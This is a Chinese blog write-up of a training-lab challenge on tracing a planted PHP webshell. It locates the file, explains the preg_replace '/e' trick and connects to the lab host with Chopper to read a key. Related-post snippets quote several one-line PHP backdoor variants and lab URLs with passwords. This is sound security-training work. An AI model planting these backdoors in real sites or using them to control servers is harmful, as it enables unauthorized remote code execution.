墨者学院-WebShell代码分析溯源(第8题)

最新推荐文章于 2019-09-20 09:30:05 发布
最新推荐文章于 2019-09-20 09:30:05 发布
阅读量266 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100548703
版权

WebShell代码分析溯源(第8题)

难易程度:★★
题目类型:代码审计
使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀

1.访问网页,下载网页源代码。

2.审查php文件,根据修改时间,发现可疑文件。
在这里插入图片描述
3.打开文件,发现确实是一句话木马病毒文件。
在这里插入图片描述

|.*|e可以把匹配来的字符串当作正则表达式执行,配合preg_replace函数使用。
所以就可以执行preg_replace('|.*|e','$_POST['pass'],' '),相当于一句话木马。

4.我们知道密码和参数后,尝试使用菜刀连接。
url为http://219.153.49.228:40060/www/fields/class-wp-rest-comment-meta-style.php?e=preg_replace
密码为pass
在这里插入图片描述
5.成功连接后,我们打开html文件夹,发现key_e857ab.php。
在这里插入图片描述
6.打开文件后获取key。
在这里插入图片描述

JimWu95
关注
墨者学院 - WebShell代码分析溯源(第8)
多崎巡礼的博客
08-05 728
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。 C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php   <?php error_reporting(0); ...
墨者学院 - WebShell代码分析溯源(第1)
多崎巡礼的博客
07-27 1310
下载源码 使用seay源代码审计系统扫一扫(实在不想一个个去看。。。) seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg     下载出源代码,找到cn-right.php   <?php error_reporting(0); $_GET['POST']($_POST['GET']); ?> ...
墨者 - WebShell代码分析溯源(第8)
吃肉唐僧的博客
07-15 294
这是一道很坑的目......花了我两天时间才搞完 先上解思路 下载文件,根据目提示说注意修改时间 一个个查看,当查看到fields文件时 大部分时间为2016.10.30,注入木马的文件是隐蔽的不想被人发现的, 所以应该不会大范围的改动文件,2.12这个文件在10.30这个日期的前面应该不可能, 最后定位到cass-wp-rest-comment-meta-style....
墨者学院--Webshell代码分析溯源8
weixin_44382289的博客
09-20 150
1.下载源码,查找木马,还是那个意思分析代码,有意思的是目给的提示。 2.根据目体现,发现fields文件夹里第二个文件修改时间最特出,打开发现,该文件就是木马文件; 分析代码,使用array_walk函数,这让我想到了preg_replace函数;(有兴趣的可以去了解了解) 所以我在这使用e=preg_replace; 3.话不多说,上刀,密码:pass,成功! 4.打开key页,得到...
墨者学院 - WebShell代码分析溯源(第7)
多崎巡礼的博客
08-05 693
代码审查 在random_int.php 前排 发现以下回调后门 <?php error_reporting(0); $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['POST']); uasort($arr, base64_decode($e)); 诸如此类还有 <?php $e = $_REQUEST['...
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 837
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     <?php error_reporting(0); call...
墨者学院 - WebShell代码分析溯源(第11)
多崎巡礼的博客
08-06 737
<?php  if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87'){                     //若get到的1不为空且1=GET.fPZ87的话执行下面操作     $_=@fopen('t.php', 'a');                                                      ...
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 713
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 806
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   <?php...
墨者学院--Webshell代码分析溯源3
weixin_44382289的博客
09-04 153
1.打开网站,攻击通告画面不忍直视,下载源码;查找木马;发现在js文件夹里有个大大的PHP文件; 2.打开PHP文件发现,后门(木马); 3.话不多说,直接上刀,成功!得到key ...
WebShell代码分析溯源(第1)墨者学院
weixin_34161032的博客
01-10 238
一、访问链接 二、下载系统源码后直接放到D盾里扫描,扫到后门文件 三、查看该木马文件 <?phperror_reporting(0);$_GET['POST']($_POST['GET']);?> 1.error_reporting(0); 关闭错误报告 2.$_GET['POST']($_POST['GET']); 一句话木马,GET传...
墨者学院 - WebShell代码分析溯源(第9)
多崎巡礼的博客
08-05 833
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。     &lt;?php error_reporting(0); $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['joker']); ...
墨者 - WebShell代码分析溯源(第1)
吃肉唐僧的博客
07-12 205
下载源码后,一个一个文件看 看到一句话木马文件, 至于代码是什么意思我有一篇博客做的时候已经详细探究过:https://blog.csdn.net/qq_39936434/article/details/95591629 接下开就是菜刀无惧链接 ...
PHP代码分析溯源(第1)
mozhe_的博客
05-25 1677
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe靶场显示一段PHP源码,经分析:1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中...
PHP WebShell源码下载(1)
热门推荐
Leesire的专栏
08-27 34万+
什么是WebShell ? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问这些asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 <?ph
大学生职业生涯规划书Word模板范文就业求职简历应聘工作PPT医疗康复专业
最新发布
10-12
大学生职业生涯规划书Word模板范文就业求职简历应聘工作PPT医疗康复专业
基于Java的学生信息管理系统的实现与操作
10-12
本文介绍了一个Java实现的小型系统 -- 学生信息管理系统,包括学生数据的增删查改四个主要操作的功能演示,并具体讲解了涉及三个核心类(Student.java、StudentManager.java、StudentFrame.java)的设计思想以及代码逻辑。适合Java初学者用来了解面向对象的概念应用以及Swing工具包进行GUI创建的基础方法和步骤。系统通过提供文本框用于输入学生ID和其他必要信息,并提供按钮来执行对应指令,显示栏展示查询结果显示,使操作变得更为简洁直观有效。 适用于初步掌握Java基础的开发者,特别是想要加强自己对面向对象编码思维理解和运用的同学。 使用此管理系统可以在本地电脑环境上进行学生的数据维护工作(如增删改查),提高学校教务工作者处理信息的效率。 除了基本的数据录入和搜索之外,该项目也帮助理解如何设计合理的模型类并使用集合存储大量数据元素,另外还介绍了如何通过事件监听的方式绑定用户行为和应用程序之间的交互流程。
基于单片机控制的填块切割装置的设计_孟紫腾.pdf
10-12
基于单片机控制的填块切割装置的设计_孟紫腾
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了防止SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来防止SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何防止SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值